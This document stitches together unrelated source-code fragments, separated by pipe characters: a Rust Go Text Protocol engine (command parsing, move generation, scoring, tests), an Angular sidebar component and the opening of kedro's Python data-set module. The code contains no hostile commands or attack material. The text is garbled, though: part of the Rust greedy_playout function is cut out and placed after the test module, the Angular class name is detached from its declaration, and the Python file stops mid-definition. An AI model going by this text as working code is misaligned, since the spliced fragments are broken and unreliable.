static ref TIME_SETTINGS: Regex = Regex::new(r"^time_settings +([0-9]+\.?[0-9]*) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
static ref KGS_TIME_SETTINGS_NONE: Regex = Regex::new(r"^kgs-time_settings +none").unwrap();
static ref KGS_TIME_SETTINGS_ABSOLUTE: Regex = Regex::new(r"^kgs-time_settings +absolute +([0-9]+\.?[0-9]*)").unwrap();
static ref KGS_TIME_SETTINGS_BYOYOMI: Regex = Regex::new(r"^kgs-time_settings +byoyomi +([0-9]+\.?[0-9]*) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
static ref KGS_TIME_SETTINGS_CANADIAN: Regex = Regex::new(r"^kgs-time_settings +canadian +([0-9]+\.?[0-9]*) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
static ref TIME_LEFT: Regex = Regex::new(r"^time_left +([bBwW]) +([0-9]+\.?[0-9]*) +([0-9]+)").unwrap();
}
struct Gtp {
ponder: PonderService,
history: Vec<Board>,
komi: f32,
time_settings: [Box<dyn time_settings::TimeSettings>; 3],
explain_last_move: String,
finished_board: Option<Result<Board, &'static str>>
}
impl Gtp {
/// Parse the GTP command in the given string and returns our internal
/// representation of the given command.
///
/// # Arguments
///
/// * `id` -
/// * `line` -
///
fn parse_command(id: Option<usize>, line: &str) -> Result<(Option<usize>, Command), &str> {
let line = &line.to_lowercase();
if line == "protocol_version" {
Ok((id, Command::ProtocolVersion))
} else if line == "name" {
Ok((id, Command::Name))
} else if line == "version" {
Ok((id, Command::Version))
} else if let Some(caps) = BOARD_SIZE.captures(line) {
let size = caps[1].parse::<usize>().map_err(|_| "syntax error")?;
Ok((id, Command::BoardSize(size)))
} else if line == "clear_board" {
Ok((id, Command::ClearBoard))
} else if let Some(caps) = KOMI.captures(line) {
let komi = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
Ok((id, Command::Komi(komi)))
} else if let Some(caps) = PLAY.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
let vertex = caps[2].parse::<Vertex>().map_err(|_| "syntax error")?;
if vertex.is_pass() {
Ok((id, Command::Play(color, None)))
} else {
Ok((id, Command::Play(color, Some(Point::new(vertex.x, vertex.y)))))
}
} else if line == "list_commands" {
Ok((id, Command::ListCommands))
} else if let Some(caps) = KNOWN_COMMAND.captures(line) {
let command = &caps[1];
Ok((id, Command::KnownCommand(command.to_string())))
} else if line == "showboard" {
Ok((id, Command::ShowBoard))
} else if let Some(caps) = GENMOVE.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
Ok((id, Command::GenMove(color, if *config::TROMP_TAYLOR { GenMoveMode::CleanUp } else { GenMoveMode::Normal })))
} else if line == "final_score" {
Ok((id, Command::FinalScore))
} else if let Some(caps) = FINAL_STATUS_LIST.captures(line) {
let status = caps[1].parse::<StoneStatus>().map_err(|_| "syntax error")?;
Ok((id, Command::FinalStatusList(status)))
} else if let Some(caps) = REG_GENMOVE.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
Ok((id, Command::GenMove(color, GenMoveMode::Regression)))
} else if let Some(caps) = KGS_GENMOVE_CLEANUP.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
Ok((id, Command::GenMove(color, GenMoveMode::CleanUp)))
} else if line == "undo" {
Ok((id, Command::Undo))
} else if let Some(caps) = LOADSGF.captures(line) {
let filename = caps[1].to_string();
let move_number = if let Some(move_number) = caps.get(2) {
move_number.as_str().parse::<usize>().map_err(|_| "syntax error")?
} else {
::std::usize::MAX
};
Ok((id, Command::LoadSgf(filename, move_number)))
} else if let Some(caps) = TIME_SETTINGS.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
if byo_yomi_time > 0.0 && byo_yomi_stones == 0 {
// we gain extra time every zero stones, so infinite...
Ok((id, Command::TimeSettingsNone))
} else if byo_yomi_time == 0.0 {
// this is effectively absolute time since we gain no extra
// time.
Ok((id, Command::TimeSettingsAbsolute(main_time)))
} else {
Ok((id, Command::TimeSettingsCanadian(main_time, byo_yomi_time, byo_yomi_stones)))
}
} else if let Some(_caps) = KGS_TIME_SETTINGS_NONE.captures(line) {
Ok((id, Command::TimeSettingsNone))
} else if let Some(caps) = KGS_TIME_SETTINGS_ABSOLUTE.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
Ok((id, Command::TimeSettingsAbsolute(main_time)))
} else if let Some(caps) = KGS_TIME_SETTINGS_BYOYOMI.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
Ok((id, Command::TimeSettingsByoYomi(main_time, byo_yomi_time, byo_yomi_stones)))
} else if let Some(caps) = KGS_TIME_SETTINGS_CANADIAN.captures(line) {
let main_time = caps[1].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
if byo_yomi_stones > 0 {
Ok((id, Command::TimeSettingsCanadian(main_time, byo_yomi_time, byo_yomi_stones)))
} else {
Err("syntax error")
}
} else if let Some(caps) = TIME_LEFT.captures(line) {
let color = caps[1].parse::<Color>().map_err(|_| "syntax error")?;
let main_time = caps[2].parse::<f32>().map_err(|_| "syntax error")?;
let byo_yomi_stones = caps[3].parse::<usize>().map_err(|_| "syntax error")?;
Ok((id, Command::TimeLeft(color, main_time, byo_yomi_stones)))
} else if line == "gomill-cpu_time" {
Ok((id, Command::CpuTime))
} else if line == "gomill-describe_engine" {
Ok((id, Command::DescribeEngine))
} else if line == "gomill-explain_last_move" {
Ok((id, Command::ExplainLastMove))
} else if line == "quit" {
Ok((id, Command::Quit))
} else {
error!(id, "unknown command");
Ok((None, Command::Pass))
}
}
/// Parse the GTP command in the given string and returns our internal
/// representation of the given command.
///
/// # Arguments
///
/// * `line` -
///
fn parse_line(line: &str) -> Option<(Option<usize>, Command)> {
let line = line.trim();
let line = {
if let Some(pos) = line.find('#') {
line[0..pos].to_string()
} else {
line.to_string()
}
};
if line.is_empty() {
Some((None, Command::Pass))
} else if let Some(caps) = ID_PREFIX.captures(&line) {
let id = caps[1].parse::<usize>().unwrap();
let rest = &caps[2];
match Gtp::parse_command(Some(id), rest.trim()) {
Ok(result) => Some(result),
Err(reason) => {
error!(Some(id), reason);
Some((None, Command::Pass))
}
}
} else {
match Gtp::parse_command(None, &line) {
Ok(result) => Some(result),
Err(reason) => {
error!(None as Option<usize>, reason);
Some((None, Command::Pass))
}
}
}
}
/// Generate a move using the monte carlo tree search engine for the given
/// color, using the stored search tree if available.
///
/// If the given `color` is not the players whose turn it is according to the
/// search tree then the tree is fast-forwarded until it is that players turn.
///
/// # Arguments
///
/// * `id` - the identifier of the command
/// * `to_move` - the color to generate the move for
/// * `mode` - determine whether this is a clean-up move
///
fn generate_move(&mut self, id: Option<usize>, to_move: Color, mode: &GenMoveMode) -> Option<Point> {
let (main_time, byo_yomi_time, byo_yomi_periods) = self.time_settings[to_move as usize].remaining();
let board = self.history.last().unwrap();
let result = self.ponder.service(|service, search_tree, p_state| {
let search_tree = if search_tree.to_move != to_move {
// passing moves are not recorded in GTP, so we will just assume
// the other player passed once if we are in this situation
mcts::tree::Node::forward(search_tree, 361)
} else {
Some(search_tree)
};
let search_options: Box<dyn TimeStrategy + Sync> =
if main_time.is_finite() && byo_yomi_time.is_finite() {
let total_visits = search_tree.as_ref()
.map(|tree| tree.total_count)
.unwrap_or(0);
Box::new(ByoYomi::new(board.count(), total_visits, main_time, byo_yomi_time, byo_yomi_periods))
} else {
Box::new(RolloutLimit::new((*config::NUM_ROLLOUT).into()))
};
let result = mcts::predict(
service,
mode.search_strategy(),
search_options,
search_tree,
&board,
to_move
);
if result.is_none() {
return (None, None, p_state)
}
// disqualify the `pass` move, and any move that is not in contested territory, if
// we are doing clean-up and the board is not scorable.
let (value, index, mut tree) = result.unwrap();
let (value, index) = if mode.is_cleanup() && index == 361 && !board.is_scorable() {
tree.disqualify(361);
for &index in &board.get_scorable_territory() {
tree.disqualify(index.to_packed_index());
}
tree.best(0.0)
} else {
(value, index)
};
let explain_last_move = mcts::tree::to_pretty(&tree).to_string();
eprintln!("{}", explain_last_move);
let should_resign = !*config::NO_RESIGN && value.is_finite() && value < 0.1; // 10% chance of winning
let index = if should_resign { 361 } else { index };
let (vertex, tree, other) = if index >= 361 { // passing move
(None, mcts::tree::Node::forward(tree, 361), board.clone())
} else {
let at_point = Point::from_packed_parts(index);
let mut other = board.clone();
other.place(to_move, at_point);
(Some(at_point), mcts::tree::Node::forward(tree, index), other)
};
(Some((vertex, should_resign, explain_last_move)), tree, (other, to_move.opposite()))
});
if let Ok(Some((point, should_resign, explain_last_move))) = result {
self.explain_last_move = explain_last_move;
self.finished_board = None;
if should_resign {
success!(id, "resign");
None
} else if let Some(point) = point { // passing move
success!(id, &format!("{}", Vertex::from(point)));
Some(point)
} else {
success!(id, "pass");
None
}
} else if let Ok(None) = result {
error!(id, "unrecognized error");
None
} else {
error!(id, result.err().unwrap());
None
}
}
fn greedy_playout(&mut self, board: &Board) -> Result<Board, &'static str> {
let mut finished_board = self.finished_board.clone();
if finished_board.as_ref().map(|f| f.is_err()).unwrap_or(false) {
finished_board = None;
}
| let mut board = board.clone();
let mut to_move = board.to_move();
let search_tree = match mcts::predict(
pool,
Box::new(ScoringSearch::default()),
Box::new(RolloutLimit::new((*config::NUM_ROLLOUT).into())),
None,
&board,
to_move
) {
Some((_value, _index, search_tree)) => search_tree,
None => { return (board, None, p_state); }
};
// before doing a greedy walk, traverse the current best path in any search tree
// we have computed
for index in GreedyPath::new(&search_tree, 8) {
if index != 361 {
board._place(to_move, Point::from_packed_parts(index));
}
to_move = to_move.opposite();
}
// greedy rollout of the rest of the game
let (finished, _rollout) = mcts::greedy_score(
pool.predictor(),
&board,
to_move
);
(finished, Some(original_search_tree), p_state)
})
}).clone();
self.finished_board = Some(result.clone());
result
}
fn process(&mut self, id: Option<usize>, cmd: Command) {
match cmd {
Command::Quit => {}
Command::Pass => {},
Command::ProtocolVersion => { success!(id, "2"); },
Command::Name => {
success!(id, get_name());
},
Command::Version => {
success!(id, get_version());
},
Command::DescribeEngine => {
success!(id, format!(
"{} {}\n{}",
get_name(),
get_version(),
config::get_description()
));
},
Command::BoardSize(size) => {
if size != 19 {
error!(id, "unacceptable size");
} else {
success!(id, "");
}
},
Command::ClearBoard => {
if self.history.len() > 1 {
self.history = vec![Board::new(self.komi)];
self.explain_last_move = String::new();
self.finished_board = None;
self.ponder = PonderService::new(Board::new(self.komi));
}
success!(id, "");
},
Command::Komi(komi) => {
if self.komi != komi {
self.komi = komi;
for board in self.history.iter_mut() {
(*board).set_komi(komi);
}
// restart the pondering service, since we have been thinking
// with the wrong komi.
let board = self.history.last().unwrap().clone();
self.ponder = PonderService::new(board);
}
success!(id, "");
},
Command::Play(color, at_point) => {
let next_board = {
let board = self.history.last().unwrap();
if let Some(at_point) = at_point {
if board.is_valid(color, at_point) {
let mut other = board.clone();
other.place(color, at_point);
self.ponder.forward(color, Some(at_point));
Some(other)
} else {
None
}
} else {
self.ponder.forward(color, None);
Some(board.clone())
}
};
if let Some(next_board) = next_board {
self.history.push(next_board);
success!(id, "");
} else {
error!(id, "illegal move");
}
},
Command::ListCommands => {
success!(id, KNOWN_COMMANDS.join("\n"));
},
Command::KnownCommand(other) => {
success!(id, {
if KNOWN_COMMANDS.iter().any(|&c| other == c) {
"true"
} else {
"false"
}
});
},
Command::ShowBoard => {
let board = self.history.last().unwrap();
success!(id, &format!("\n{}", board));
},
Command::GenMove(color, mode) => {
let start_time = Instant::now();
let at_point = self.generate_move(id, color, &mode);
if !mode.is_regression() {
if let Some(at_point) = at_point {
let mut board = self.history.last().unwrap().clone();
board.place(color, at_point);
self.history.push(board);
}
}
// update the remaining main time, saturating at zero instead of
// overflowing.
let elapsed = start_time.elapsed();
let elapsed_secs = elapsed.as_secs() as f32 + elapsed.subsec_nanos() as f32 / 1e9;
let c = color as usize;
self.time_settings[c].update(elapsed_secs);
},
Command::ExplainLastMove => {
success!(id, self.explain_last_move);
},
Command::FinalScore => {
let board = self.history.last().unwrap().clone();
let result = self.greedy_playout(&board);
if let Ok(finished) = result {
let (black, white) = board.get_guess_score(&finished);
eprintln!("Black: {}", black);
eprintln!("White: {} + {}", white, self.komi);
let black = black as f32;
let white = white as f32 + self.komi;
if black == white {
success!(id, "0");
} else if black > white {
success!(id, &format!("B+{:.1}", black - white));
} else if white > black {
success!(id, &format!("W+{:.1}", white - black));
}
} else {
error!(id, result.err().unwrap());
}
},
Command::FinalStatusList(status) => {
let board = self.history.last().unwrap().clone();
let result = self.greedy_playout(&board);
if let Ok(finished) = result {
let status_list = board.get_stone_status(&finished);
let vertices = status_list.into_iter()
.filter_map(|(index, stone_status)| {
if stone_status.contains(&status) {
Some(format!("{}", Vertex::from(index)))
} else {
None
}
})
.collect::<Vec<String>>();
success!(id, vertices.join(" "));
} else {
error!(id, result.err().unwrap());
}
},
Command::LoadSgf(filename, move_number) => {
if let Ok(file) = File::open(filename) {
let mut buf_reader = BufReader::new(file);
let mut content = vec! [];
if let Err(_reason) = buf_reader.read_to_end(&mut content) {
error!(id, "cannot read file content");
}
self.history = vec! [];
self.explain_last_move = String::new();
self.finished_board = None;
for entry in Sgf::new(&content, self.komi).take(move_number) {
match entry {
Ok(entry) => {
self.history.push(entry.board);
},
Err(_reason) => {
error!(id, "failed to parse file");
return;
}
}
}
// start the pondering agent
let board = self.history.last().unwrap().clone();
self.ponder = PonderService::new(board);
success!(id, "");
} else {
error!(id, "cannot open file");
}
},
Command::Undo => {
if self.history.len() > 1 {
self.history.pop();
// update the ponder state with the new board position
let board = self.history.last().unwrap().clone();
self.explain_last_move = String::new();
self.finished_board = None;
self.ponder = PonderService::new(board);
success!(id, "");
} else {
error!(id, "cannot undo");
}
},
Command::TimeSettingsNone => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::None::new());
}
success!(id, "");
},
Command::TimeSettingsAbsolute(main_time) => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::Absolute::new(main_time));
}
success!(id, "");
},
Command::TimeSettingsByoYomi(main_time, byo_yomi_time, byo_yomi_stones) => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::ByoYomi::new(
main_time,
byo_yomi_time,
byo_yomi_stones
));
}
success!(id, "");
},
Command::TimeSettingsCanadian(main_time, byo_yomi_time, byo_yomi_stones) => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::Canadian::new(
main_time,
byo_yomi_time,
byo_yomi_stones
));
}
success!(id, "");
},
Command::TimeLeft(color, main_time, byo_yomi_stones) => {
let c = color as usize;
self.time_settings[c].time_left(main_time, byo_yomi_stones);
success!(id, "");
},
Command::CpuTime => {
let cpu_time = self.ponder.cpu_time();
let secs = cpu_time.as_secs() as f64 + cpu_time.subsec_nanos() as f64 / 1e6;
success!(id, format!("{:.4}", secs));
}
}
}
}
/// Returns the name of this engine.
pub fn get_name() -> String {
env::var("DG_NAME").unwrap_or_else(|_| env!("CARGO_PKG_NAME").to_string())
}
/// Returns the version of this engine.
pub fn get_version() -> String {
env::var("DG_VERSION").unwrap_or_else(|_| env!("CARGO_PKG_VERSION").to_string())
}
/// Run the GTP (Go Text Protocol) client that reads from standard input
/// and writes to standard output. This client implements the minimum
/// necessary feature-set of a GTP client.
pub fn run() {
let stdin = ::std::io::stdin();
let stdin_lock = stdin.lock();
let mut gtp = Gtp {
ponder: PonderService::new(Board::new(DEFAULT_KOMI)),
history: vec! [Board::new(DEFAULT_KOMI)],
komi: DEFAULT_KOMI,
explain_last_move: String::new(),
finished_board: None,
time_settings: [
Box::new(time_settings::None::new()),
Box::new(time_settings::None::new()),
Box::new(time_settings::None::new()),
],
};
for line in stdin_lock.lines() {
if let Ok(line) = line {
match Gtp::parse_line(&line) {
Some((id, Command::Quit)) => {
success!(id, "");
break;
},
Some((id, cmd)) => gtp.process(id, cmd),
_ => break
}
} else {
break
}
}
}
#[cfg(test)]
mod tests {
use dg_go::*;
use gtp::*;
#[test]
fn protocol_verion() {
assert_eq!(Gtp::parse_line("1 protocol_version"), Some((Some(1), Command::ProtocolVersion)));
assert_eq!(Gtp::parse_line("protocol_version"), Some((None, Command::ProtocolVersion)));
}
#[test]
fn name() {
assert_eq!(Gtp::parse_line("1 name"), Some((Some(1), Command::Name)));
assert_eq!(Gtp::parse_line("name"), Some((None, Command::Name)));
}
#[test]
fn version() {
assert_eq!(Gtp::parse_line("1 version"), Some((Some(1), Command::Version)));
assert_eq!(Gtp::parse_line("version"), Some((None, Command::Version)));
}
#[test]
fn boardsize() {
assert_eq!(Gtp::parse_line("1 boardsize 7"), Some((Some(1), Command::BoardSize(7))));
assert_eq!(Gtp::parse_line("boardsize 13"), Some((None, Command::BoardSize(13))));
}
#[test]
fn clear_board() {
assert_eq!(Gtp::parse_line("1 clear_board"), Some((Some(1), Command::ClearBoard)));
assert_eq!(Gtp::parse_line("clear_board"), Some((None, Command::ClearBoard)));
}
#[test]
fn komi() {
assert_eq!(Gtp::parse_line("1 komi 0.5"), Some((Some(1), Command::Komi(0.5))));
assert_eq!(Gtp::parse_line("komi 10"), Some((None, Command::Komi(10.0))));
assert_eq!(Gtp::parse_line("komi -7.5"), Some((None, Command::Komi(-7.5))));
}
#[test]
fn play() {
assert_eq!(Gtp::parse_line("1 play b c2"), Some((Some(1), Command::Play(Color::Black, Some(Point::new(2, 1))))));
assert_eq!(Gtp::parse_line("play w a1"), Some((None, Command::Play(Color::White, Some(Point::new(0, 0))))));
}
#[test]
fn list_commands() {
assert_eq!(Gtp::parse_line("1 list_commands"), Some((Some(1), Command::ListCommands)));
assert_eq!(Gtp::parse_line("list_commands"), Some((None, Command::ListCommands)));
}
#[test]
fn known_command() {
assert_eq!(Gtp::parse_line("1 known_command aaaa"), Some((Some(1), Command::KnownCommand("aaaa".to_string()))));
assert_eq!(Gtp::parse_line("known_command genmove"), Some((None, Command::KnownCommand("genmove".to_string()))));
}
#[test]
fn showboard() {
assert_eq!(Gtp::parse_line("1 showboard"), Some((Some(1), Command::ShowBoard)));
assert_eq!(Gtp::parse_line("showboard"), Some((None, Command::ShowBoard)));
}
#[test]
fn genmove() {
assert_eq!(Gtp::parse_line("1 genmove b"), Some((Some(1), Command::GenMove(Color::Black, GenMoveMode::Normal))));
assert_eq!(Gtp::parse_line("genmove w"), Some((None, Command::GenMove(Color::White, GenMoveMode::Normal))));
}
#[test]
fn final_score() {
assert_eq!(Gtp::parse_line("1 final_score"), Some((Some(1), Command::FinalScore)));
assert_eq!(Gtp::parse_line("final_score"), Some((None, Command::FinalScore)));
}
#[test]
fn final_status_list() {
assert_eq!(Gtp::parse_line("1 final_status_list dead"), Some((Some(1), Command::FinalStatusList(StoneStatus::Dead))));
assert_eq!(Gtp::parse_line("final_status_list alive"), Some((None, Command::FinalStatusList(StoneStatus::Alive))));
assert_eq!(Gtp::parse_line("final_status_list dead"), Some((None, Command::FinalStatusList(StoneStatus::Dead))));
assert_eq!(Gtp::parse_line("final_status_list seki"), Some((None, Command::FinalStatusList(StoneStatus::Seki))));
assert_eq!(Gtp::parse_line("final_status_list black_territory"), Some((None, Command::FinalStatusList(StoneStatus::BlackTerritory))));
assert_eq!(Gtp::parse_line("final_status_list white_territory"), Some((None, Command::FinalStatusList(StoneStatus::WhiteTerritory))));
}
#[test]
fn reg_genmove() {
assert_eq!(Gtp::parse_line("1 reg_genmove b"), Some((Some(1), Command::GenMove(Color::Black, GenMoveMode::Regression))));
assert_eq!(Gtp::parse_line("reg_genmove w"), Some((None, Command::GenMove(Color::White, GenMoveMode::Regression))));
}
#[test]
fn kgs_genmove_cleanup() {
assert_eq!(Gtp::parse_line("1 kgs-genmove_cleanup b"), Some((Some(1), Command::GenMove(Color::Black, GenMoveMode::CleanUp))));
assert_eq!(Gtp::parse_line("kgs-genmove_cleanup w"), Some((None, Command::GenMove(Color::White, GenMoveMode::CleanUp))));
}
#[test]
fn loadsgf() {
assert_eq!(Gtp::parse_line("1 loadsgf x.sgf"), Some((Some(1), Command::LoadSgf("x.sgf".into(), ::std::usize::MAX))));
assert_eq!(Gtp::parse_line("loadsgf x.sgf"), Some((None, Command::LoadSgf("x.sgf".into(), ::std::usize::MAX))));
assert_eq!(Gtp::parse_line("loadsgf x/y/z.sgf 120"), Some((None, Command::LoadSgf("x/y/z.sgf".into(), 120))));
}
#[test]
fn undo() {
assert_eq!(Gtp::parse_line("1 undo"), Some((Some(1), Command::Undo)));
assert_eq!(Gtp::parse_line("undo"), Some((None, Command::Undo)));
}
#[test]
fn time_settings() {
assert_eq!(Gtp::parse_line("1 time_settings 0 1 0"), Some((Some(1), Command::TimeSettingsNone)));
assert_eq!(Gtp::parse_line("1 time_settings 30.2 0 0"), Some((Some(1), Command::TimeSettingsAbsolute(30.2))));
assert_eq!(Gtp::parse_line("time_settings 300 3.14 1"), Some((None, Command::TimeSettingsCanadian(300.0, 3.14, 1))));
}
#[test]
fn kgs_time_settings() {
assert_eq!(Gtp::parse_line("1 kgs-time_settings none"), Some((Some(1), Command::TimeSettingsNone)));
assert_eq!(Gtp::parse_line("kgs-time_settings none"), Some((None, Command::TimeSettingsNone)));
assert_eq!(Gtp::parse_line("2 kgs-time_settings absolute 30.2"), Some((Some(2), Command::TimeSettingsAbsolute(30.2))));
assert_eq!(Gtp::parse_line("kgs-time_settings absolute 300"), Some((None, Command::TimeSettingsAbsolute(300.0))));
assert_eq!(Gtp::parse_line("3 kgs-time_settings byoyomi 30.2 0 0"), Some((Some(3), Command::TimeSettingsByoYomi(30.2, 0.0, 0))));
assert_eq!(Gtp::parse_line("kgs-time_settings byoyomi 300 3.14 1"), Some((None, Command::TimeSettingsByoYomi(300.0, 3.14, 1))));
assert_eq!(Gtp::parse_line("4 kgs-time_settings canadian 30.2 1 1"), Some((Some(4), Command::TimeSettingsCanadian(30.2, 1.0, 1))));
assert_eq!(Gtp::parse_line("kgs-time_settings canadian 300 3.14 1"), Some((None, Command::TimeSettingsCanadian(300.0, 3.14, 1))));
}
#[test]
fn time_left() {
assert_eq!(Gtp::parse_line("1 time_left b 3.14 0"), Some((Some(1), Command::TimeLeft(Color::Black, 3.14, 0))));
assert_eq!(Gtp::parse_line("time_left W 278.1 1"), Some((None, Command::TimeLeft(Color::White, 278.1, 1))));
}
#[test]
fn gomill_explain_last_move() {
assert_eq!(Gtp::parse_line("1 gomill-explain_last_move"), Some((Some(1), Command::ExplainLastMove)));
assert_eq!(Gtp::parse_line("gomill-explain_last_move"), Some((None, Command::ExplainLastMove)));
}
#[test]
fn gomill_describe_engine() {
assert_eq!(Gtp::parse_line("1 gomill-describe_engine"), Some((Some(1), Command::DescribeEngine)));
assert_eq!(Gtp::parse_line("gomill-describe_engine"), Some((None, Command::DescribeEngine)));
}
#[test]
fn gomill_cpu_time() {
assert_eq!(Gtp::parse_line("1 gomill-cpu_time"), Some((Some(1), Command::CpuTime)));
assert_eq!(Gtp::parse_line("gomill-cpu_time"), Some((None, Command::CpuTime)));
}
#[test]
fn quit() {
assert_eq!(Gtp::parse_line("1 quit"), Some((Some(1), Command::Quit)));
assert_eq!(Gtp::parse_line("quit"), Some((None, Command::Quit)));
}
#[test]
fn empty() {
assert_eq!(Gtp::parse_line(""), Some((None, Command::Pass)));
}
} | let result = finished_board.get_or_insert_with(|| {
self.ponder.service(|pool, original_search_tree, p_state| {
// if the search tree is too small, the expand it before continuing |
sidebar.component.ts | import { Component, Output, EventEmitter, OnInit } from '@angular/core';
import { Router, NavigationEnd } from '@angular/router';
import { TranslateService } from '@ngx-translate/core';
@Component({
selector: 'app-sidebar',
templateUrl: './sidebar.component.html',
styleUrls: ['./sidebar.component.scss']
})
export class | {
isActive: boolean = false;
collapsed: boolean = false;
showMenu: string = '';
pushRightClass: string = 'push-right';
@Output() collapsedEvent = new EventEmitter<boolean>();
constructor(private translate: TranslateService, public router: Router) {
this.translate.addLangs(['en', 'fr', 'ur', 'es', 'it', 'fa', 'de']);
this.translate.setDefaultLang('en');
const browserLang = this.translate.getBrowserLang();
this.translate.use(browserLang.match(/en|fr|ur|es|it|fa|de/) ? browserLang : 'en');
this.router.events.subscribe(val => {
if (
val instanceof NavigationEnd &&
window.innerWidth <= 992 &&
this.isToggled()
) {
this.toggleSidebar();
}
});
}
eventCalled() {
this.isActive = !this.isActive;
}
addExpandClass(element: any) {
if (element === this.showMenu) {
this.showMenu = '0';
} else {
this.showMenu = element;
}
}
toggleCollapsed() {
this.collapsed = !this.collapsed;
this.collapsedEvent.emit(this.collapsed);
}
isToggled(): boolean {
const dom: Element = document.querySelector('body');
return dom.classList.contains(this.pushRightClass);
}
toggleSidebar() {
const dom: any = document.querySelector('body');
dom.classList.toggle(this.pushRightClass);
}
rltAndLtr() {
const dom: any = document.querySelector('body');
dom.classList.toggle('rtl');
}
changeLang(language: string) {
this.translate.use(language);
}
// onLoggedout() {
// localStorage.removeItem('isLoggedin');
// }
}
| SidebarComponent |
core.py | # Copyright 2018-2019 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides a set of classes which underpin the data loading and
saving functionality provided by ``kedro.io``.
"""
import abc
import copy
import logging
import os
from collections import namedtuple
from datetime import datetime, timezone
from glob import iglob
from pathlib import Path, PurePath
from typing import Any, Callable, Dict, List, Optional, Tuple, Type
from urllib.parse import urlparse
from warnings import warn
from kedro.utils import load_obj
VERSIONED_FLAG_KEY = "versioned"
VERSION_KEY = "version"
class DataSetError(Exception):
"""``DataSetError`` raised by ``AbstractDataSet`` implementations
in case of failure of input/output methods.
``AbstractDataSet`` implementations should provide instructive
information in case of failure.
"""
pass
class DataSetNotFoundError(DataSetError):
"""``DataSetNotFoundError`` raised by ``DataCatalog`` class in case of
trying to use a non-existing data set.
"""
pass
class DataSetAlreadyExistsError(DataSetError):
"""``DataSetAlreadyExistsError`` raised by ``DataCatalog`` class in case
of trying to add a data set which already exists in the ``DataCatalog``.
"""
pass
class VersionNotFoundError(DataSetError):
"""``VersionNotFoundError`` raised by ``AbstractVersionedDataSet`` implementations
in case of no load versions available for the data set.
"""
pass
class AbstractDataSet(abc.ABC):
"""``AbstractDataSet`` is the base class for all data set implementations.
All data set implementations should extend this abstract class
and implement the methods marked as abstract.
Example:
::
>>> from kedro.io import AbstractDataSet
>>> import pandas as pd
>>>
>>> class MyOwnDataSet(AbstractDataSet):
>>> def __init__(self, param1, param2):
>>> self._param1 = param1
>>> self._param2 = param2
>>>
>>> def _load(self) -> pd.DataFrame:
>>> print("Dummy load: {}".format(self._param1))
>>> return pd.DataFrame()
>>>
>>> def _save(self, df: pd.DataFrame) -> None:
>>> print("Dummy save: {}".format(self._param2))
>>>
>>> def _describe(self):
>>> return dict(param1=self._param1, param2=self._param2)
"""
@classmethod
def from_config(
cls: Type,
name: str,
config: Dict[str, Any],
load_version: str = None,
save_version: str = None,
) -> "AbstractDataSet":
"""Create a data set instance using the configuration provided.
Args:
name: Data set name.
config: Data set config dictionary.
load_version: Version string to be used for ``load`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
save_version: Version string to be used for ``save`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
Returns:
An instance of an ``AbstractDataSet`` subclass.
Raises:
DataSetError: When the function fails to create the data set
from its config.
"""
try:
class_obj, config = parse_dataset_definition(
config, load_version, save_version
)
except Exception as ex:
raise DataSetError(
"An exception occurred when parsing config "
"for DataSet `{}`:\n{}".format(name, str(ex))
)
try:
data_set = class_obj(**config) # type: ignore
except TypeError as err:
raise DataSetError(
"\n{}.\nDataSet '{}' must only contain "
"arguments valid for the constructor "
"of `{}.{}`.".format(
str(err), name, class_obj.__module__, class_obj.__qualname__
)
)
except Exception as err:
raise DataSetError(
"\n{}.\nFailed to instantiate DataSet "
"'{}' of type `{}.{}`.".format(
str(err), name, class_obj.__module__, class_obj.__qualname__
)
)
return data_set
@property
def _logger(self) -> logging.Logger:
